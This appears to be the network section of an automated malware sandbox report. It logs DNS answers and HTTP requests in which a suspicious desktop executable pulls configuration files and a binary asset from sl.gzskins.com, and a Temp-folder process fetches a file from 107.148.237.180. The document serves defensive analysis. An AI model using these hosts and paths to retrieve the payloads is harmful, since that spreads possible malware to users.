                                                                                                                                            Nov 6, 2024 16:40:42.381524086 CET90278000192.168.2.1047.102.130.81
                                                                                                                                            Nov 6, 2024 16:40:42.381562948 CET90278000192.168.2.10111.206.4.176
                                                                                                                                            Nov 6, 2024 16:40:42.778264046 CET4966353192.168.2.101.1.1.1
                                                                                                                                            Nov 6, 2024 16:40:42.998018026 CET53496631.1.1.1192.168.2.10
                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                            Nov 6, 2024 16:40:21.407730103 CET192.168.2.101.1.1.1c222(Port unreachable)Destination Unreachable
                                                                                                                                            Nov 6, 2024 16:40:27.002461910 CET192.168.2.1192.168.2.1082f3(Port unreachable)Destination Unreachable
                                                                                                                                            Nov 6, 2024 16:40:27.002470970 CET192.168.2.1192.168.2.1082f2(Port unreachable)Destination Unreachable
                                                                                                                                            Nov 6, 2024 16:40:27.366147041 CET192.168.2.101.1.1.1c2b1(Port unreachable)Destination Unreachable
                                                                                                                                            Nov 6, 2024 16:40:29.990015030 CET192.168.2.1192.168.2.1082f3(Port unreachable)Destination Unreachable
                                                                                                                                            Nov 6, 2024 16:40:29.990029097 CET192.168.2.1192.168.2.1082f2(Port unreachable)Destination Unreachable
                                                                                                                                            Nov 6, 2024 16:40:37.476507902 CET192.168.2.1192.168.2.1082f3(Port unreachable)Destination Unreachable
                                                                                                                                            Nov 6, 2024 16:40:37.476526022 CET192.168.2.1192.168.2.1082f2(Port unreachable)Destination Unreachable
                                                                                                                                            Nov 6, 2024 16:40:40.498121977 CET192.168.2.1192.168.2.1082f3(Port unreachable)Destination Unreachable
                                                                                                                                            Nov 6, 2024 16:40:40.498145103 CET192.168.2.1192.168.2.1082f2(Port unreachable)Destination Unreachable
Timestamp, Source IP, Dest IP, Trans ID, OP Code, Name, Type, Class, DNS over HTTPS
Timestamp, Source IP, Dest IP, Trans ID, Reply Code, Name, CName, Address, Type, Class, DNS over HTTPS
                                                                                                                                            Nov 6, 2024 16:40:27.366082907 CET1.1.1.1192.168.2.100xfed0No error (0)cncidx.m.hub.sandai.net116.132.219.184A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.366082907 CET1.1.1.1192.168.2.100xfed0No error (0)cncidx.m.hub.sandai.net116.132.218.191A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.366082907 CET1.1.1.1192.168.2.100xfed0No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:27.366082907 CET1.1.1.1192.168.2.100xfed0No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:28.431875944 CET1.1.1.1192.168.2.100x7c6No error (0)imhub5pr.hz.sandai.net127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:28.566091061 CET1.1.1.1192.168.2.100x7c7No error (0)score.phub.hz.sandai.net127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:28.870048046 CET1.1.1.1192.168.2.100x7c5No error (0)hub5pr.hz.sandai.nethub5pr.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:28.870048046 CET1.1.1.1192.168.2.100x7c5No error (0)hub5pr.sandai.netpr.x.hub.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:28.870048046 CET1.1.1.1192.168.2.100x7c5No error (0)pr.x.hub.sandai.net116.132.219.22A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:28.870048046 CET1.1.1.1192.168.2.100x7c5No error (0)pr.x.hub.sandai.net140.206.220.33A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:30.021692991 CET1.1.1.1192.168.2.100x7c8No error (0)bjbgp01.baidupcs.combjbgp01.n.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:30.021692991 CET1.1.1.1192.168.2.100x7c8No error (0)bjbgp01.n.shifen.com113.200.1.7A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.296195984 CET1.1.1.1192.168.2.100x9249No error (0)skinx.x1.lolgezi.cc107.148.237.1A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.458899021 CET1.1.1.1192.168.2.100x7c1Name error (3)pmap.hz.sandai.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.465991974 CET1.1.1.1192.168.2.100x7c1Name error (3)pmap.hz.sandai.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.942502975 CET1.1.1.1192.168.2.100x7c4No error (0)hubstat.hz.sandai.nethubstat.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.942502975 CET1.1.1.1192.168.2.100x7c4No error (0)hubstat.sandai.netcnchubstat.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.942502975 CET1.1.1.1192.168.2.100x7c4No error (0)cnchubstat.sandai.net140.206.225.136A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.942502975 CET1.1.1.1192.168.2.100x7c4No error (0)cnchubstat.sandai.net140.206.225.232A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.970666885 CET1.1.1.1192.168.2.100x427Name error (3)pmap.hz.sandai.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.977638960 CET1.1.1.1192.168.2.100x7c1Name error (3)pmap.hz.sandai.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:32.992218971 CET1.1.1.1192.168.2.100x7c1Name error (3)pmap.hz.sandai.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)hub5idx.shub.hz.sandai.nethub5t.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)hub5t.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net116.132.218.191A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net116.132.223.136A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538702011 CET1.1.1.1192.168.2.100x7c3No error (0)cncidx.m.hub.sandai.net116.132.219.184A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)hub5c.hz.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net116.132.218.191A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net116.132.223.136A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:33.538804054 CET1.1.1.1192.168.2.100x7c0No error (0)cncidx.m.hub.sandai.net116.132.219.184A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:34.185591936 CET1.1.1.1192.168.2.100x7c5No error (0)download6.mcloud.139.com36.138.50.131A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:35.605325937 CET1.1.1.1192.168.2.100x7c7No error (0)imhub5pr.hz.sandai.net127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:35.770466089 CET1.1.1.1192.168.2.100x7c8No error (0)score.phub.hz.sandai.net127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:36.381460905 CET1.1.1.1192.168.2.100x7c6No error (0)hub5pr.hz.sandai.nethub5pr.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:36.381460905 CET1.1.1.1192.168.2.100x7c6No error (0)hub5pr.sandai.netpr.x.hub.sandai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:36.381460905 CET1.1.1.1192.168.2.100x7c6No error (0)pr.x.hub.sandai.net116.132.219.22A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:36.381460905 CET1.1.1.1192.168.2.100x7c6No error (0)pr.x.hub.sandai.net140.206.220.33A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:41.395823956 CET1.1.1.1192.168.2.100xbb24No error (0)skinx.x1.lolgezi.cc107.148.237.1A (IP address)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:42.998018026 CET1.1.1.1192.168.2.100xd333No error (0)bjbgp01.baidupcs.combjbgp01.n.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 6, 2024 16:40:42.998018026 CET1.1.1.1192.168.2.100xd333No error (0)bjbgp01.n.shifen.com113.200.1.7A (IP address)IN (0x0001)false
                                                                                                                                            • https:
                                                                                                                                              • download6.mcloud.139.com
                                                                                                                                            • bjbgp01.baidupcs.com
                                                                                                                                            • sl.gzskins.com
                                                                                                                                            • skinx.x1.lolgezi.cc
                                                                                                                                            • 140.206.225.136:80
                                                                                                                                            • 112.64.218.154:80
                                                                                                                                            • 116.132.218.191:80
                                                                                                                                            • 116.132.219.22:80
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 57237 | 180.163.146.103 | 80 | 7512 | C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 16:40:21.416253090 CET | 142 | OUT | GET / HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
Nov 6, 2024 16:40:22.406078100 CET | 804 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 238
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:22 GMT
                                                                                                                                            X-Tengine-Error: You are forbidden to list buckets
                                                                                                                                            Via: cache28.l2cn2656[0,0,403-1280,M], cache40.l2cn2656[1,0], kunlun7.cn7174[13,13,403-1280,M], kunlun3.cn7174[20,0]
                                                                                                                                            Ali-Swift-Global-Savetime: 1730907622
                                                                                                                                            X-Cache: MISS TCP_MISS dirn:-2:-2
                                                                                                                                            X-Swift-Error: orig response 4XX error
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 15:40:22 GMT
                                                                                                                                            X-Swift-CacheTime: 1
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076222595605e
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
Nov 6, 2024 16:40:22.407591105 CET | 162 | OUT | GET /SLVersionConfig.json HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
Nov 6, 2024 16:40:22.717986107 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 1359
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 15:01:06 GMT
                                                                                                                                            x-oss-request-id: 672B84B22C1E933631C90322
                                                                                                                                            x-oss-cdn-auth: success
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            x-oss-object-type: Normal
                                                                                                                                            x-oss-storage-class: Standard
                                                                                                                                            x-oss-server-side-encryption: AES256
                                                                                                                                            Content-MD5: ry+XRVjefiaoWlCuVfLNrQ==
                                                                                                                                            x-oss-server-time: 4
                                                                                                                                            Via: cache13.l2cn3130[0,0,304-0,H], cache44.l2cn3130[1,0], kunlun7.cn7174[0,0,200-0,H], kunlun3.cn7174[1,0]
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            ETag: "AF2F974558DE7E26A85A50AE55F2CDAD"
                                                                                                                                            Last-Modified: Mon, 21 Oct 2024 11:20:51 GMT
                                                                                                                                            x-oss-hash-crc64ecma: 4119829755262503702
                                                                                                                                            Age: 2356
                                                                                                                                            Ali-Swift-Global-Savetime: 1730905266
                                                                                                                                            X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 15:27:54 GMT
                                                                                                                                            X-Swift-CacheTime: 3600
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076225897118e
Nov 6, 2024 16:40:22.718017101 CET | 1007 | IN | Data Raw: [binary data omitted]
Nov 6, 2024 16:40:22.724719048 CET | 142 | OUT | GET / HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
Nov 6, 2024 16:40:23.042407990 CET | 768 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 238
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:22 GMT
                                                                                                                                            X-Tengine-Error: You are forbidden to list buckets
                                                                                                                                            Via: cache28.l2cn2656[0,0,403-1280,M], cache40.l2cn2656[1,0], kunlun7.cn7174[0,0,403-0,H], kunlun3.cn7174[4,0]
                                                                                                                                            Age: 0
                                                                                                                                            Ali-Swift-Global-Savetime: 1730907622
                                                                                                                                            X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 15:40:22 GMT
                                                                                                                                            X-Swift-CacheTime: 1
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076229088651e
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
Nov 6, 2024 16:40:23.043690920 CET  162  OUT  GET /SLVersionConfig.json HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
Nov 6, 2024 16:40:23.354614973 CET  1236  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 1359
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 15:01:06 GMT
                                                                                                                                            x-oss-request-id: 672B84B22C1E933631C90322
                                                                                                                                            x-oss-cdn-auth: success
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            x-oss-object-type: Normal
                                                                                                                                            x-oss-storage-class: Standard
                                                                                                                                            x-oss-server-side-encryption: AES256
                                                                                                                                            Content-MD5: ry+XRVjefiaoWlCuVfLNrQ==
                                                                                                                                            x-oss-server-time: 4
                                                                                                                                            Via: cache13.l2cn3130[0,0,304-0,H], cache44.l2cn3130[1,0], kunlun7.cn7174[0,0,200-0,H], kunlun3.cn7174[2,0]
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            ETag: "AF2F974558DE7E26A85A50AE55F2CDAD"
                                                                                                                                            Last-Modified: Mon, 21 Oct 2024 11:20:51 GMT
                                                                                                                                            x-oss-hash-crc64ecma: 4119829755262503702
                                                                                                                                            Age: 2357
                                                                                                                                            Ali-Swift-Global-Savetime: 1730905266
                                                                                                                                            X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 15:27:54 GMT
                                                                                                                                            X-Swift-CacheTime: 3600
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076232252160e
Nov 6, 2024 16:40:23.354635954 CET  1007  IN
Nov 6, 2024 16:40:23.357914925 CET  142  OUT  GET / HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
Nov 6, 2024 16:40:23.725223064 CET  807  IN  HTTP/1.1 403 Forbidden
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 238
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:23 GMT
                                                                                                                                            X-Tengine-Error: You are forbidden to list buckets
                                                                                                                                            Via: cache27.l2cn3130[43,43,403-1280,M], cache24.l2cn3130[44,0], kunlun7.cn7174[54,54,403-1280,M], kunlun3.cn7174[57,0]
                                                                                                                                            Ali-Swift-Global-Savetime: 1730907623
                                                                                                                                            X-Cache: MISS TCP_MISS dirn:-2:-2
                                                                                                                                            X-Swift-Error: orig response 4XX error
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 15:40:23 GMT
                                                                                                                                            X-Swift-CacheTime: 1
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076235413592e
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
Nov 6, 2024 16:40:23.726429939 CET  161  OUT  GET /SLServerConfig.json HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
Nov 6, 2024 16:40:24.036721945 CET  1236  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 4310
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 14:45:25 GMT
                                                                                                                                            x-oss-request-id: 672B810553726E3132A019E7
                                                                                                                                            x-oss-cdn-auth: success
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            x-oss-object-type: Normal
                                                                                                                                            x-oss-storage-class: Standard
                                                                                                                                            x-oss-server-side-encryption: AES256
                                                                                                                                            Content-MD5: Jr+I4nMytCTYtGoBNfZdvg==
                                                                                                                                            x-oss-server-time: 4
                                                                                                                                            Via: cache6.l2cn3107[15,14,304-0,H], cache63.l2cn3107[16,0], kunlun5.cn7174[0,0,200-0,H], kunlun3.cn7174[3,0]
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            ETag: "26BF88E27332B424D8B46A0135F65DBE"
                                                                                                                                            Last-Modified: Tue, 05 Nov 2024 13:12:30 GMT
                                                                                                                                            x-oss-hash-crc64ecma: 7128468848774176665
                                                                                                                                            Age: 3298
                                                                                                                                            Ali-Swift-Global-Savetime: 1730904325
                                                                                                                                            X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 14:45:25 GMT
                                                                                                                                            X-Swift-CacheTime: 3600
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076239075256e
Nov 6, 2024 16:40:24.036740065 CET  212  IN
Nov 6, 2024 16:40:24.036753893 CET  1236  IN
Nov 6, 2024 16:40:24.036782980 CET  236  IN
Nov 6, 2024 16:40:24.057406902 CET  1236  IN
Nov 6, 2024 16:40:24.059947014 CET  1040  IN
Nov 6, 2024 16:40:30.432409048 CET  142  OUT  GET / HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
Nov 6, 2024 16:40:30.963033915 CET  803  IN  HTTP/1.1 403 Forbidden
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 238
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:30 GMT
                                                                                                                                            X-Tengine-Error: You are forbidden to list buckets
                                                                                                                                            Via: cache27.l2cn3130[1,0,403-1280,M], cache3.l2cn3130[1,0], kunlun7.cn7174[17,17,403-1280,M], kunlun3.cn7174[19,0]
                                                                                                                                            Ali-Swift-Global-Savetime: 1730907630
                                                                                                                                            X-Cache: MISS TCP_MISS dirn:-2:-2
                                                                                                                                            X-Swift-Error: orig response 4XX error
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 15:40:30 GMT
                                                                                                                                            X-Swift-CacheTime: 1
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076308173929e
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1><p>You don't have permission to access the URL on this server.<hr/>Powered by Tengine</body></html>
Nov 6, 2024 16:40:30.964068890 CET  161  OUT  GET /SLServerConfig.json HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
Nov 6, 2024 16:40:31.273690939 CET  1236  IN  HTTP/1.1 200 OK
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 4310
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 14:45:25 GMT
                                                                                                                                            x-oss-request-id: 672B810553726E3132A019E7
                                                                                                                                            x-oss-cdn-auth: success
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            x-oss-object-type: Normal
                                                                                                                                            x-oss-storage-class: Standard
                                                                                                                                            x-oss-server-side-encryption: AES256
                                                                                                                                            Content-MD5: Jr+I4nMytCTYtGoBNfZdvg==
                                                                                                                                            x-oss-server-time: 4
                                                                                                                                            Via: cache6.l2cn3107[15,14,304-0,H], cache63.l2cn3107[16,0], kunlun5.cn7174[0,0,200-0,H], kunlun3.cn7174[1,0]
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            ETag: "26BF88E27332B424D8B46A0135F65DBE"
                                                                                                                                            Last-Modified: Tue, 05 Nov 2024 13:12:30 GMT
                                                                                                                                            x-oss-hash-crc64ecma: 7128468848774176665
                                                                                                                                            Age: 3306
                                                                                                                                            Ali-Swift-Global-Savetime: 1730904325
                                                                                                                                            X-Cache: HIT TCP_MEM_HIT dirn:-2:-2
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 14:45:25 GMT
                                                                                                                                            X-Swift-CacheTime: 3600
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076311465336e
                                                                                                                                            Nov 6, 2024 16:40:38.442290068 CET | 142 | OUT | GET / HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Nov 6, 2024 16:40:38.834227085 CET | 569 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 238
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 15:40:38 GMT
                                                                                                                                            X-Tengine-Error: You are forbidden to list buckets
                                                                                                                                            Via: cache27.l2cn3130[62,62,403-1280,M], cache61.l2cn3130[67,0], kunlun7.cn7174[82,81,403-1280,M], kunlun3.cn7174[84,0]
                                                                                                                                            Ali-Swift-Global-Savetime: 1730907638
                                                                                                                                            X-Cache: MISS TCP_MISS dirn:-2:-2
                                                                                                                                            X-Swift-Error: orig response 4XX error
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 15:40:38 GMT
                                                                                                                                            X-Swift-CacheTime: 1
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076386235405e
                                                                                                                                            Nov 6, 2024 16:40:38.844647884 CET | 159 | OUT | GET /SLAppAssets101.to HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
                                                                                                                                            Host: sl.gzskins.com
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Nov 6, 2024 16:40:39.178335905 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                            Server: Tengine
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Content-Length: 315734
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Date: Wed, 06 Nov 2024 14:58:04 GMT
                                                                                                                                            x-oss-request-id: 672B83FC818A3130376A4DFC
                                                                                                                                            x-oss-cdn-auth: success
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            x-oss-object-type: Normal
                                                                                                                                            x-oss-storage-class: Standard
                                                                                                                                            x-oss-server-side-encryption: AES256
                                                                                                                                            Content-MD5: 8/Mz7Iph5UI1uAJBsA9FeA==
                                                                                                                                            x-oss-server-time: 19
                                                                                                                                            Via: cache2.l2cn3130[0,0,304-0,H], cache13.l2cn3130[2,0], kunlun7.cn7174[14,24,200-0,H], kunlun3.cn7174[27,0]
                                                                                                                                            ETag: "F3F333EC8A61E54235B80241B00F4578"
                                                                                                                                            Last-Modified: Wed, 23 Oct 2024 12:14:12 GMT
                                                                                                                                            x-oss-hash-crc64ecma: 7414391600638129604
                                                                                                                                            Age: 2555
                                                                                                                                            Ali-Swift-Global-Savetime: 1730905084
                                                                                                                                            X-Cache: HIT TCP_REFRESH_HIT dirn:9:211679714
                                                                                                                                            X-Swift-SaveTime: Wed, 06 Nov 2024 15:40:39 GMT
                                                                                                                                            X-Swift-CacheTime: 3600
                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                            EagleId: b4a3921717309076390247160e


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            1 | 192.168.2.10 | 57263 | 107.148.237.180 | 80 | 8156 | C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            Nov 6, 2024 16:40:26.325428963 CET | 344 | OUT | GET /d/PanAlistPhoto/SLBox241019_2.webm HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-CH
                                                                                                                                            Cache-Control: no-cache
